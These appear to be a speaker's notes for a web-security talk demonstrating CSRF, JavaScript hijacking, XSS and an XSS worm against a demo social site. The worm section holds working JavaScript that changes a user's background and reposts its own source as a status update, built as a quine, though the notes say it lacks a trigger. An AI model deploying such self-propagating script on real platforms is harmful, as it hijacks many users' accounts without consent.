Demo 1: CSRF
------------

Introduce BlabberOne: blabberone.sitepen.com

Show:
- all users making friends
- sending messages
- getting random friends

Ensure the audience has seen tweets. Hop over to Twitter and check out the tweet from Dion:
http://localhost:8080/csrf-demo/ (CSRF to remove all tweets)

The point: the page that Dion linked to used CSRF to abuse my superuser privs on BlabberOne to delete all the tweets.

Demo 2: JavaScript Hijack
-------------------------

Visit http://localhost:8080/csrf-demo/hijack.html

Point out that this is using CSRF to READ.

Demo 3: XSS
-----------

Change my BG to black.

Jeremiah: log into blabberone, and message this: Some random message

Demo 4: Worm
------------

If we get time.

Worm notes
----------

This is the payload (SOURCE stands for the script's own text, which the quines below supply):

    var p = window.parent;
    p.Network.getCurrentUser(function(user) {
        if (user.background != '000') {
            p.Network.setBackground('000');
            p.document.body.style.background = '#000';
            window.parent.Network.updateStatus(SOURCE);
        }
    });

This is a quine in JavaScript:

    var s="var s=X;var q=String.fromCharCode(34);console.log(s.replace(/X/,q+s+q));";var q=String.fromCharCode(34);console.log(s.replace(/X/,q+s+q));

This is another:

    (function quine(){return '('+quine+')();';})();

This is the payload applied to the first quine; however, this doesn't have a way to spark the script:

    var s="var s=X;var q=String.fromCharCode(34);var p = window.parent;p.Network.getCurrentUser(function(user){if(user.background!='000'){p.Network.setBackground('000');p.document.body.style.background='#000';window.parent.Network.updateStatus(s.replace(/X/,q+s+q));}});";
    var q=String.fromCharCode(34);
    var p = window.parent;
    p.Network.getCurrentUser(function(user){
        if(user.background!='000'){
            p.Network.setBackground('000');
            p.document.body.style.background='#000';
            window.parent.Network.updateStatus(s.replace(/X/,q+s+q));
        }
    });

Using script decompilation (gives syntax error):

Initial random message

XSS sources:
